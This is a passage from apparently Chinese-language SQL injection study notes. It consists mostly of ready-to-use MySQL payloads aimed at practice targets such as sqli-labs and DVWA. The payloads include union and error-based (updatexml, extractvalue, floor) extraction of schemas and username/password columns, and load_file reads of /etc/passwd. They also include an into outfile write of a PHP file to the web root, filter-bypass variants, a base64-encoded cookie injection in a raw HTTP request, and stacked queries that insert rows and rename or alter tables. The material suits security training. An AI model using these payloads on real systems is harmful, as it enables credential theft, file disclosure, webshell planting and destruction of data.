?id=-2 union select 1,group_concat(schema_name),3 from information_schema.schemata–+
2、指定获取book库中的表名信息
?id=-2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=’book’–+
3、获取指定数据库security下的users表的列名信息
?id=-2’ union select 1,group_concat(column_name),3 from information_schema.columns where table_name=’users’ and table_schema=’security’–+
4、查询到指定数据
?id=-2 union select book_id,book_title,book_author from book.book limit 0,1——z–+
?id=-1’ union select 1,2,group_concat(username ,id , password) from users ——全部
文件读写函数注入
load_file 文件读取
into outfile 或into dumpfile 文件写入
?id=-2 union select 1,load_file(‘/etc/passwd’),3
?id=-2’ union select 1,load_file(‘/var/www/html/flag.php’),3–+
?id=-2’union select 1,’‘,3 into outfile ‘/var/www/html/chuan.php’ –+
二、报错盲注
报错注入所利用函数
updatexml extractvalue floor
updatexml函数的基本语法:
updatexml(xml_document, XPath_string, new_value)
其中,xml_document是XML文档对象,XPath_string是Xpath路径表达式,new_value是更新后的内容。在报错注入中,我们通常将第一个和第三个参数设置为任意值,重点是通过第二个参数注入不符合Xpath语法的表达式,从而引起数据库报错,并通过错误信息获取数据。
extractvalue函数的基本语法:
extractvalue(xml_frag, xpath_expr)
其中,xml_frag是XML片段,xpath_expr是Xpath表达式。在报错注入中,通过提供一个无效的Xpath表达式,导致函数报错,从而获取数据。
floor()
用于返回小于或等于一个给定数字的最大整数。在SQL注入中,利用 floor() 函数可以构造报错注入。它通常和 group by 以及 count(*) 等函数一起使用来触发数据库报错,从而获取敏感信息。
报错语句
1’ and extractvalue(1,concat(0x7e,(select group_concat(id,0x7e,username,0x3a,password) from security.users))) #
使用substring截断
?id=1' and extractvalue(1,concat(0x7e, (select substring((select group_concat(id,0x7e,flag) from ctf.flags),1,1000) )))--+
1、updatexml payload示例
1、爆数据库版本信息
k’ and updatexml(1,concat(0x7e,(select version()),0x7e),1)%23
k写啥都可以,0x7e是16进制,表示字符‘~’。
selecty
2、爆数据库当前用户
?id=1” and updatexml(1,concat(0x7e,(select user()),0x7e),1)–+
3、爆数据库
- 所有
?id=1’ and updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 1,1),0x7e),1)–+ - 当前
?id=1” and updatexml(1,concat(0x7e,(select database()),0x7e),1)–+
4、爆表
?id=1” and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e),1)–+
更改limit后面的数字limit 0完成表名遍历(即在查询网址上面修改来一个一个查看)。
使用group_concat(table_name)一次性查询出所有的表名
?id=1” and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1)–+
5、获取users表的字段名
?id=1” and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=’security’ and table_name=’users’),0x7e),1)–+
6、获取users表的内容
id=1” and updatexml(1,concat(0x7e,(select group_concat(username,0x3a,password) from users),0x7e),1)–+
2、extractvalue payload
payload
1’ and extractvalue(1,concat(0x7e,user(),0x7e,database())) #
1’ and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) #
1’ and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=’users’))) #
1’ and extractvalue(1,concat(0x7e,(select group_concat(user_id,0x7e,first_name,0x3a,last_name) from dvwa.users))) #
3、floor函数
判断是否存在报错注入
id=1’ union select #添加count()可以增加列数 count(),floor(rand(0)*2) x from information_schema.schemata group by x#
爆出当前数据库名
id=1’ union select count(*),concat(floor(rand(0)*2),database()) x from information_schema.schemata group by x #
爆出表
id=1’ union select count(*),concat(floor(rand(0)*2),0x3a,(select concat(table_name) from information_schema.tables where table_schema=’dvwa’ limit 0,1)) x from information_schema.schemata group by x#
爆出字段名
id=1’ union select count(*),concat(floor(rand(0)*2),0x3a,(select concat(column_name) from information_schema.columns where table_name=’users’ and table_schema=’dvwa’ limit 0,1)) x from information_schema.schemata group by x#
爆出user和password
id=1’ union select count(*),concat(floor(rand(0)*2),0x3a,(select concat(user,0x3a,password) from dvwa.users limit 0,1)) x from information_schema.schemata group by x#
严格过滤
逻辑运算符,注释符以及空格
?id=1’||(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema=’security’))),1))||’0 爆表
?id=1’||(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(infoorrmation_schema.columns)where(table_schema=’security’aandnd(table_name=’users’)))),1))||’0 爆字段
?id=1’||(updatexml(1,concat(0x7e,(select(group_concat(passwoorrd,username))from(users))),1))||’0 爆密码账户
三、其余注入
1、加解密注入
抓取cookie数据包
1
2
3
4
5
6
7
8
9
10
GET /Less-21/index.php HTTP/1.1
Host: 10.1.1.133
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://10.1.1.133/Less-21/index.php
Connection: close
Cookie: uname=YWRtaW4%3D
Upgrade-Insecure-Requests: 1YWRtaW4%3D这是一个base64加密的字符串其中%3D是编码中的=符号,把他发送到编码模块当中解密,得到明文
发现这个是注入点需要将原来的注入方式重新加密发送给服务器
也就是说admin’ and 1=1加密之后的值是YWRtaW4nIGFuZCAxPTE=
获取数据库名称admin’ or updatexml(1,concat(0x7e,(database())),0) or ‘加密后cookie值Cookie: uname=YWRtaW4nIG9yIHVwZGF0ZXhtbCgxLGNvbmNhdCgweDdlLChkYXRhYmFzZSgpKSksMCkgb3IgJwo=
2、二次注入
二次注入一般是用于白盒测试、黑盒测试就算是找到注入也没办法攻击。
最后我们看到的是将admin的账户密码修改为了123456而admin’#并没有发生改变,原因是代码执行的过程中将’#没有过滤直接带入执行导致’与前面的代码闭合而#将后面的代码给注释。
3、dnslog注入
涉及资源:http://ceye.io
参考资料:https://www.cnblogs.com/xhds/p/12322839.html
使用DnsLog盲注仅限于windos环境。
4、中转注入
中转一个网站,利用网站进行数据集中改变
5、堆叠查询注入
stacked injections(堆叠注入)从名词的含义就可以看到应该是一堆sql语句(多条)一起执行。而在真实的运用中也是这样的,我们知道在mysql 中,主要是命令行中,每一条语句结尾加;表示语句结束。这样我们就想到了是不是可以多句一起使用。这个叫做stacked injection。
简单payload
http://10.1.1.133/Less-38/index.php?id=1 ‘;insert into users(id,username,password) values ( 39, ‘less38 ‘, ‘hello ‘)–+
查询数据库
1’;show databases;–+
查表
?inject=1’;show tables–+
查列
1’; show columns from words– q
修改操作
1’;rename table words to word2;rename table 1919810931114514 to words;ALTER TABLE words ADD id int(10) DEFAULT ‘12’;ALTER TABLE words CHANGE flag data VARCHAR(100);– q